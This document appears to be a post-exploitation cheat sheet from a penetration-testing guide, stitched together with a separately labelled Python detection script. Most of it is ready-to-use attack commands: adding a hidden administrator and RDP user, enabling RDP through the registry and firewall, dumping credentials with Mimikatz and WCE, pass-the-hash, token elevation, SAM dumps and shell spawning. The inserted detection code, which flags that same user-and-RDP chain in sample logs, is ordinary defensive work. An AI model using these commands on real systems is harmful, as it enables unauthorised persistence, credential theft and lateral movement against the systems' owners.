Post exploitation

Don't stop here, you are only halfway.

Proof.txt

Linux

cat /root/proof.txt

Windows

type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Add firewall rule:

netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
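A detection-side counterpart to the add-user / enable-RDP chain above, added here as an example and not part of the original cheat sheet: it runs one rule per stage over constructed process-creation log lines (the log format, host names and rule names are assumptions) and escalates hosts where several stages co-occur within a short window.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation log lines ("<iso time> <host> <command line>"), not real
# telemetry: WS01 replays the full add-user / enable-RDP chain, WS02 only adds a user.
SAMPLE_LOG = """2024-05-01T10:00:01 WS01 net user hodor Qwerty123! /add
2024-05-01T10:00:03 WS01 net localgroup administrators hodor /add
2024-05-01T10:00:04 WS01 net localgroup "Remote Desktop Users" hodor /add
2024-05-01T10:00:09 WS01 reg add "hklm\\system\\currentcontrolset\\control\\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
2024-05-01T10:00:12 WS01 netsh firewall set service remotedesktop enable
2024-05-01T14:30:00 WS02 net user svc_backup P@ssw0rd /add
"""

# One rule per stage of the chain; the stage names are ours, not a vendor's.
RULES = [
    ("local_user_added", re.compile(r"^net\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("admin_group_member_added", re.compile(r"^net\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("rdp_group_member_added", re.compile(r'^net\s+localgroup\s+"remote desktop users"\s+\S+\s+/add\b', re.I)),
    ("rdp_enabled_registry", re.compile(r"^reg\s+add\s+.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("rdp_firewall_opened", re.compile(r"^netsh\s+firewall\s+set\s+service\s+remotedesktop\s+enable\b", re.I)),
]

def parse(log_text):
    """Yield (timestamp, host, command line) from the constructed log format."""
    for line in log_text.splitlines():
        if line.strip():
            ts, host, cmd = line.split(" ", 2)
            yield datetime.fromisoformat(ts), host, cmd

def detect(log_text, window=timedelta(minutes=10)):
    """Per host, the distinct chain stages seen within `window` of that host's first hit.
    The window keeps unrelated admin activity hours later from being merged into one alert."""
    first_hit, stages = {}, {}
    for ts, host, cmd in sorted(parse(log_text)):
        for name, rx in RULES:
            if rx.search(cmd) and ts - first_hit.setdefault(host, ts) <= window:
                stages.setdefault(host, set()).add(name)
    return {h: sorted(s) for h, s in stages.items()}

def high_confidence(findings, min_stages=2):
    """Hosts where two or more stages co-occur: a lone 'net user /add' is routine,
    user + group + registry + firewall in one window is the cheat-sheet pattern."""
    return sorted(h for h, s in findings.items() if len(s) >= min_stages)

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for host, names in found.items():
        print(host, names)
    print("escalate:", high_confidence(found))
```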

Rdesktop resolution

rdesktop -g 1024x768 x.x.x.x

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:

privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords

Pass-the-hash

privilege::debug
log sekurlsa.log
sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd

Elevate token

privilege::debug
log sekurlsa.log
token::elevate

Dump SAM

privilege::debug
log sekurlsa.log
lsadump::sam

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.

C:\> wce -w

Networking

Is there a connection with another host?

netstat -ano

Hosts file

C:\WINDOWS\System32\drivers\etc\hosts

Firewall config

netsh firewall show state
netsh firewall show config
netsh dump

PowerShell tools

Empire

PowerSploit

Linux

Spawn TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'
